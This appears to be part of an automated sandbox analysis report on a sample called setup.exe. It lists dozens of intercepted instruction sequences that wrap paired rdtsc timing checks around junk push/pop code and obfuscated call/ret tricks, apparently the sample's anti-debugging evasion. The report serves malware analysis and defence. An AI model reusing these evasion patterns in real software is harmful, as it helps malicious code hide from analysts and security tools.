Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 933EB2 second address: 933ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA24820DA5h 0x0000000b jl 00007FBA24820D96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 933ED3 second address: 933EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 933EDD second address: 933EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97B28F second address: 97B296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97B296 second address: 95BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FBA24820D98h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D278Ch], ebx 0x00000028 call dword ptr [ebp+122D3874h] 0x0000002e push ecx 0x0000002f jmp 00007FBA24820D9Ah 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FBA24820D9Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 jmp 00007FBA24820DA8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97B7FA second address: 97B7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97B7FE second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+1246E724h], eax 0x0000000e push dword ptr [ebp+122D1685h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FBA24820D98h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D24A2h], ecx 0x00000034 call dword ptr [ebp+122D389Ah] 0x0000003a pushad 0x0000003b jns 00007FBA24820DADh 0x00000041 xor eax, eax 0x00000043 add dword ptr [ebp+122D1A4Ch], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D1EFAh], edi 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D29CCh], eax 0x0000005b js 00007FBA24820DA2h 0x00000061 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000067 mov esi, 0000003Ch 0x0000006c cld 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1A4Ch], esi 0x00000077 lodsw 0x00000079 jmp 00007FBA24820DA8h 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 clc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 stc 0x00000088 push eax 0x00000089 push esi 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97BB0A second address: 97BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 sbb edx, 0589A7FFh 0x0000000f nop 0x00000010 je 00007FBA2516CD54h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FBA2516CD46h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97BDEC second address: 97BE5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FBA24820D98h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FBA24820D98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov cl, B4h 0x00000047 mov edi, ebx 0x00000049 popad 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jng 00007FBA24820D96h 0x00000054 jmp 00007FBA24820D9Dh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C556 second address: 97C55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C5F5 second address: 97C60E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FBA24820D98h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FBA24820D96h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C60E second address: 97C618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C618 second address: 97C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C61C second address: 97C69A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBA2516CD48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FBA2516CD4Ch 0x0000002c mov edi, dword ptr [ebp+122D1A3Eh] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D1994h] 0x00000039 pushad 0x0000003a mov eax, dword ptr [ebp+122D23CDh] 0x00000040 mov si, di 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp+1247FFF4h] 0x0000004a jmp 00007FBA2516CD50h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FBA2516CD52h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C69A second address: 97C6E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBA24820D9Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124492F7h], eax 0x00000014 lea eax, dword ptr [ebp+1247FFB0h] 0x0000001a mov dx, 4AC5h 0x0000001e nop 0x0000001f jmp 00007FBA24820DA5h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007FBA24820D98h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C6E2 second address: 97C6EC instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA2516CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7657 second address: 9A766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA24820DA4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7A93 second address: 9A7A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7A99 second address: 9A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7AA7 second address: 9A7AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7AAD second address: 9A7AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7AB3 second address: 9A7AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7AB7 second address: 9A7ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FBA24820D9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7D94 second address: 9A7D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7D9A second address: 9A7DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBA24820D9Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A7DB3 second address: 9A7DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007FBA2516CD46h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AE155 second address: 9AE159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AE159 second address: 9AE1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA2516CD57h 0x0000000b jmp 00007FBA2516CD4Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBA2516CD57h 0x00000017 jmp 00007FBA2516CD4Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AE1A8 second address: 9AE1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9ACE36 second address: 9ACE46 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA2516CD46h 0x00000008 jo 00007FBA2516CD46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9ACE46 second address: 9ACE85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBA24820D96h 0x00000012 jmp 00007FBA24820DA9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9ACFF5 second address: 9AD045 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBA2516CD52h 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007FBA2516CD46h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jbe 00007FBA2516CD46h 0x00000018 jmp 00007FBA2516CD4Eh 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 jmp 00007FBA2516CD52h 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AD199 second address: 9AD1AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA24820D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AD353 second address: 9AD37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD59h 0x00000009 jmp 00007FBA2516CD4Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AD5E0 second address: 9AD5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AD73E second address: 9AD76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD54h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AC87D second address: 9AC885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AC885 second address: 9AC8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FBA2516CD46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9AC8AC second address: 9AC8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3E4C second address: 9B3E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FBA2516CD59h 0x00000015 jmp 00007FBA2516CD53h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3E74 second address: 9B3E79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 93E123 second address: 93E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2B66 second address: 9B2B9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBA24820DA5h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBA24820D9Eh 0x0000001a jnc 00007FBA24820D96h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2B9F second address: 9B2BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2CE2 second address: 9B2CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2CE8 second address: 9B2CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2CED second address: 9B2D14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D9Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jng 00007FBA24820D96h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBA24820DA2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B2D14 second address: 9B2D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA2516CD55h 0x00000010 jmp 00007FBA2516CD4Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3117 second address: 9B312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA24820D96h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007FBA24820D96h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B325A second address: 9B3260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3260 second address: 9B3264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3264 second address: 9B3279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3279 second address: 9B3287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FBA24820D96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B36E1 second address: 9B36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B36E5 second address: 9B3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Dh 0x00000007 ja 00007FBA24820D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FBA24820D96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3706 second address: 9B370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B370A second address: 9B3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FBA24820DA2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B3728 second address: 9B372C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B6B5B second address: 9B6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B6B5F second address: 9B6B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBA2516CD58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD51h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9B6B8E second address: 9B6BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA5h 0x00000007 push edi 0x00000008 jg 00007FBA24820D96h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBA24820DA8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 93C64F second address: 93C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD5DD second address: 9BD5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD5E1 second address: 9BD5F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD5F0 second address: 9BD5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA24820D96h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD149 second address: 9BD16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD58h 0x00000007 jnc 00007FBA2516CD46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD16B second address: 9BD1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 jmp 00007FBA24820DA3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA24820DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD303 second address: 9BD30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9BD30D second address: 9BD311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C078F second address: 9C07AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C07AE second address: 9C07D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBA24820DA7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9391AF second address: 9391B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C00DE second address: 9C010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA8h 0x00000007 jmp 00007FBA24820D9Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C0233 second address: 9C0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C4568 second address: 9C4572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBA24820D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C3C44 second address: 9C3C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA2516CD4Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C41EB second address: 9C41EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C41EF second address: 9C4203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBA2516CD52h 0x0000000c jns 00007FBA2516CD46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C4203 second address: 9C4214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA24820D9Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C4214 second address: 9C4218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C7BBC second address: 9C7BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C7BC0 second address: 9C7BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD53h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C7BD9 second address: 9C7BE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA24820DA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
